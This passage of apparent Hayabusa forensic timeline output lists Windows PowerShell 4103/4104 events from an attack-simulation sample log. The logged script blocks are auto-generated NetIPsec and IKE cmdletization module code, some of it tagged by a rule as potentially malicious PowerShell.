(@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase2AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.561 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"eter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase2AuthSet' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.562 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.565 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.566 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.566 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.567 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.567 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.568 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.568 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase2AuthSet"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEMMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodPa",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEMMCryptoSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { 